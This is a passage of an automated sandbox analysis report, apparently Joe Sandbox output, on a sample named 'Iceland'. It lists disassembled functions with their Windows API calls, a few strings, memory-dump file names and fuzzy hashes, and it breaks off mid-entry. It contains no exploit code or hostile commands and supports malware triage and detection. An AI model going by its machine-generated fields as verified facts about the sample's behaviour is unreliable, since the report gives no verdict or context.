Instruction Fuzzy Hash: 5A11397AD00218FFEB119BA4CD85F9DBB78FB08B50F204091EA05BB290D6716E10DB94

Function 00911AAC Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 0091249F: GetWindowLongW.USER32(00000000,000000EB), ref: 009124B0

DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00911AF4
GetClientRect.USER32(?,?), ref: 009531F9
GetCursorPos.USER32(?), ref: 00953203
ScreenToClient.USER32(?,?), ref: 0095320E

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 099d3ffe07990972d6a16145c1519de58ec283ac2427a153d8f0d7e924cd6259
Instruction ID: 31f0958fce091ba2ca17c06da6493d76ddf5f92c6fc80b6a7d01979c6b4f422e
Opcode Fuzzy Hash: 099d3ffe07990972d6a16145c1519de58ec283ac2427a153d8f0d7e924cd6259
Instruction Fuzzy Hash: 47114C31A0611DFBDB10DFA4C9859EE7BB8EF45345F104452FA02E7140C770BA91DBA1

Function 0097EAED Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0097EB14
MessageBoxW.USER32(?,?,?,?), ref: 0097EB47
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0097EB5D
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0097EB64

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 2be75e7e1810ec701921b9e5ced18980789c016a83db2291f51d35fcd9e260e6
Instruction ID: 51cd4e44f9652d48edb9912dee00df36f88c97629630f522e28e534720c11536
Opcode Fuzzy Hash: 2be75e7e1810ec701921b9e5ced18980789c016a83db2291f51d35fcd9e260e6
Instruction Fuzzy Hash: E1114E7791C258BFCB019FA89C45A9F7FACEF4A310F008256F816D7290D674CD049BA0

Function 0093D53C Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,0093D369,00000000,00000004,00000000), ref: 0093D588
GetLastError.KERNEL32 ref: 0093D594
__dosmaperr.LIBCMT ref: 0093D59B
ResumeThread.KERNEL32(00000000), ref: 0093D5B9

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: 36916fee1e1e65f9f6eaac56ad13bd94ba0d8952be2ba5443d2fbddca28e4894
Instruction ID: c6dfce863111374fd436da16f1822a6960bc76bc61c5e952427f0145d5abfe40
Opcode Fuzzy Hash: 36916fee1e1e65f9f6eaac56ad13bd94ba0d8952be2ba5443d2fbddca28e4894
Instruction Fuzzy Hash: D301F9724161147BDB116FA5FC19FAE7B6DEFC2339F100215F925861E0DF718800DAA1

Function 00917873 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 009178B1
GetStockObject.GDI32(00000011), ref: 009178C5
SendMessageW.USER32(00000000,00000030,00000000), ref: 009178CF

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: c7857d08e7bd3fe3b59f46565ae03d537d84f73f9b0fae708af2e255d9e1e59b
Instruction ID: 236eb40f0888cb4f26b1d85ab7fdb28458df2bbe2844a5584ed5e3424bb8a2f9
Opcode Fuzzy Hash: c7857d08e7bd3fe3b59f46565ae03d537d84f73f9b0fae708af2e255d9e1e59b
Instruction Fuzzy Hash: D711ADB260A14EBFDF065F90CC98EEABB6DFF09364F040115FA0152120DB319CA0EBA0

Function 009433E6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,0094338D,00000364,00000000,00000000,00000000,?,009435FE,00000006,FlsSetValue), ref: 00943418
GetLastError.KERNEL32(?,0094338D,00000364,00000000,00000000,00000000,?,009435FE,00000006,FlsSetValue,009B3260,FlsSetValue,00000000,00000364,?,009431B9), ref: 00943424
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0094338D,00000364,00000000,00000000,00000000,?,009435FE,00000006,FlsSetValue,009B3260,FlsSetValue,00000000), ref: 00943432

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 3ba9621c5be144d46bfad7ec03b014bb407f9db71d0176e56bd73fc7f688f31c
Instruction ID: 0f3d1770dd4de889c4750eeb6634b484108fda4924d2770aa589775ad3a83e51
Opcode Fuzzy Hash: 3ba9621c5be144d46bfad7ec03b014bb407f9db71d0176e56bd73fc7f688f31c
Instruction Fuzzy Hash: 0301A732726222ABCB324B799C44ED67B9CFF15B717218620FA16D75A0D724DE01C6E0

Function 0097BA6F Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0097B69A,?,00008000), ref: 0097BA8B
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0097B69A,?,00008000), ref: 0097BAB0
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0097B69A,?,00008000), ref: 0097BABA
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0097B69A,?,00008000), ref: 0097BAED

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 14c6e4fab224364582598c84b933ef7ece077ab698a9a43739247d97bd145cf8
Instruction ID: d1ca95a30e8d7b18b049fa300adce44a7032f73592eb5a9768943ea1f4447f0d
Opcode Fuzzy Hash: 14c6e4fab224364582598c84b933ef7ece077ab698a9a43739247d97bd145cf8
Instruction Fuzzy Hash: E9118B32C0962DEBCF08EFE4E94A7EEBBB8BF09710F108095D945B2540CB308650DBA5

Function 009A886F Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 009A888E
ScreenToClient.USER32(?,?), ref: 009A88A6
ScreenToClient.USER32(?,?), ref: 009A88CA
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 009A88E5

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 5675e4c9834f769b23bf632e12766e860a8c65933aa9546b3a81c299848fe8e9
Instruction ID: 569add0823dcf67ba345d888bba3259052e6a6dc3e076058c95b43a6e5c7c756
Opcode Fuzzy Hash: 5675e4c9834f769b23bf632e12766e860a8c65933aa9546b3a81c299848fe8e9
Instruction Fuzzy Hash: 8D1160B9D01209AFDB01CFA8C884AEEBBB9FF09314F108066E915E2610D735AA50DF90

Function 009736F4 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00973712
GetWindowThreadProcessId.USER32(?,00000000), ref: 00973723
GetCurrentThreadId.KERNEL32 ref: 0097372A
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00973731

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: cb2f7a104eed5e94ca18b3ce1292ac87c0f2400f36b232c05b3bb6738fc9cc72
Instruction ID: 28a5afa38bf84d5ffc0f45ff6c6008f87eeb7a5319ff7f23ecc86f38f93f30fb
Opcode Fuzzy Hash: cb2f7a104eed5e94ca18b3ce1292ac87c0f2400f36b232c05b3bb6738fc9cc72
Instruction Fuzzy Hash: AAE06DB22162247ADA281BA29C4DEEB7F6CDF43BA1F004015F10AD2480DAA48A40E2F1

Function 009A92BF Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00911F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00911F87
Part of subcall function 00911F2D: SelectObject.GDI32(?,00000000), ref: 00911F96
Part of subcall function 00911F2D: BeginPath.GDI32(?), ref: 00911FAD
Part of subcall function 00911F2D: SelectObject.GDI32(?,00000000), ref: 00911FD6

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 009A92E3
LineTo.GDI32(?,?,?), ref: 009A92F0
EndPath.GDI32(?), ref: 009A9300
StrokePath.GDI32(?), ref: 009A930E

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 2a3fb715a05a5272872ecabf197e988a9800a181e6b535ba8485d8246d566973
Instruction ID: 0d557371e87f8024683dba0beac45bc80a057b29e6fc28bb8488a7593d8ee0c5
Opcode Fuzzy Hash: 2a3fb715a05a5272872ecabf197e988a9800a181e6b535ba8485d8246d566973
Instruction Fuzzy Hash: 82F05E3101A268BADB125F54AD0EFCE3F69AF0B324F048000FA12251E2CB759562ABE5

Function 009121A0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 009121BC
SetTextColor.GDI32(?,?), ref: 009121C6
SetBkMode.GDI32(?,00000001), ref: 009121D9
GetStockObject.GDI32(00000005), ref: 009121E1

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: b3efcd63db747ed7a9c869259e449b2ea555626184554bb2d73b601c285abd41
Instruction ID: c2a5f9db1702127c7547114fb2478a38e3ef91a6c8d6f9bba5fe1d7ec6f53e34
Opcode Fuzzy Hash: b3efcd63db747ed7a9c869259e449b2ea555626184554bb2d73b601c285abd41
Instruction Fuzzy Hash: 43E06531259240AADB215B75AC097E87B15AF13336F14C219F7BA544E0C7714645AB50

Function 0096EC36 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0096EC36
GetDC.USER32(00000000), ref: 0096EC40
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0096EC60
ReleaseDC.USER32(?), ref: 0096EC81

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 0ba0edf42002864a68776fac9ddff6925ea3d6e20966c3d4877830d85e6ba459
Instruction ID: fe6a9cd9b07b86522aa45b5a51074b8c8c6540deec1bb9d88b97b6ab4a2581fe
Opcode Fuzzy Hash: 0ba0edf42002864a68776fac9ddff6925ea3d6e20966c3d4877830d85e6ba459
Instruction Fuzzy Hash: 82E01AB4C15204DFCB40AFA0D948A9DBBB1EF48310F108409E84BE3650C7385942AF40

Function 0096EC4A Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0096EC4A
GetDC.USER32(00000000), ref: 0096EC54
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0096EC60
ReleaseDC.USER32(?), ref: 0096EC81

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 93a7b71f94235b2e3a39226c800d1a874396fe3889b7e0aca058aefe57f8ef68
Instruction ID: e42f2f3360175438ec684ef68fe691b4190c85137203806733ede8f12c9c5aa3
Opcode Fuzzy Hash: 93a7b71f94235b2e3a39226c800d1a874396fe3889b7e0aca058aefe57f8ef68
Instruction Fuzzy Hash: C0E01AB4C15204DFCB409FA0D948A9DBBB1EF48310B108409E84AE3650C7385901AF40

Function 009857CC Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 009141EA: _wcslen.LIBCMT ref: 009141EF

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00985919

Strings

*, xrefs: 00985855
LPT, xrefs: 00985840

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: 56c2842ddd07b4bf2a8e1b013b588ec87e484f95df5e5984275d714027e6403e
Instruction ID: 2177624ca98e690719b61b8748a212b6493f23524c66e54230041234182b6a1f
Opcode Fuzzy Hash: 56c2842ddd07b4bf2a8e1b013b588ec87e484f95df5e5984275d714027e6403e
Instruction Fuzzy Hash: B5919F75A00604DFCB14EF54C4D4EAABBF5AF44314F1A8099E84A9F362C775EE89CB90

Function 0093E5ED Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0093E67D

Strings

pow, xrefs: 0093E655, 0093E672

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: f09bcda4aec9277135c6dc35aced7348f467a8d1ce3614b49e4b5ee2da80819d
Instruction ID: 0f98a712c99de8c0d414e22ae78cbfdbe0b2dc3775cd1a7bafd0c1723c180b72
Opcode Fuzzy Hash: f09bcda4aec9277135c6dc35aced7348f467a8d1ce3614b49e4b5ee2da80819d
Instruction Fuzzy Hash: 10519061E2C10296D715B714CE42BBF2BECEB54754F308E5AF092422E8DF358D85AF46

Function 0092A8EC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 0092A916

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 8f5a69621b64125fe267dafcf087d67bab8c466212525b18ad66d7876593a52f
Instruction ID: 14ab6a09c8aa6ad2641675ac85bac13fc6ab1d708cf58ed37263c0d467493fe2
Opcode Fuzzy Hash: 8f5a69621b64125fe267dafcf087d67bab8c466212525b18ad66d7876593a52f
Instruction Fuzzy Hash: 2D514136608256DFCF25DF28D041AFA7BA9EF55310F24415AF8919B2E0DF349D82CBA1

Function 0092F6CA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 0092F6DB
GlobalMemoryStatusEx.KERNEL32(?), ref: 0092F6F4

Strings

@, xrefs: 0092F6E8

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 0d8c00d88926f54e0b40698a1351bd58e21e7fe5ed3b1c571b63b6bf49f1aef1
Instruction ID: fc8ab2041591c1b015e53362374c6f0dba25328e889e87a98cdb8dfec4b05619
Opcode Fuzzy Hash: 0d8c00d88926f54e0b40698a1351bd58e21e7fe5ed3b1c571b63b6bf49f1aef1
Instruction Fuzzy Hash: 2B5135B19187489BD320AF10DC86BABBBF8FFC4304F81885EF599411A1DF308569CB66

Function 009961A2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?), ref: 0099623D
_wcslen.LIBCMT ref: 00996249

Strings

CALLARGARRAY, xrefs: 00996243, 00996248

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY
API String ID: 157775604-1150593374
Opcode ID: f8aab65d4b985c9a51b809f50b57861abc153eaed8fde36ca768dca5573cceca
Instruction ID: d213d7aa063e89e4358e7659a0c09881332d010a5dff7612aafc1a0fe5a6b49c
Opcode Fuzzy Hash: f8aab65d4b985c9a51b809f50b57861abc153eaed8fde36ca768dca5573cceca
Instruction Fuzzy Hash: 7641A371E002199FCF14DFA8C8959EEBBB5FF99364F104069E416E7251D770AD81CB90

Function 0098DB39 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0098DB75
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0098DB7F

Strings

|, xrefs: 0098DB50

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: CrackInternet_wcslen
String ID: |
API String ID: 596671847-2343686810
Opcode ID: d0440152215a64df8a595ba7cc1752ba44f532339e8fdebdd219d66f25927ba0
Instruction ID: 240118ff8912a827d0095d7d58102483ed219eb367ae95bc983ca7a8f763c60b
Opcode Fuzzy Hash: d0440152215a64df8a595ba7cc1752ba44f532339e8fdebdd219d66f25927ba0
Instruction Fuzzy Hash: 75315E71D01119ABCF15EFA4CC85EEEBFB9FF44304F100069F815A62A2EB719A56DB50

Function 009A4008 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

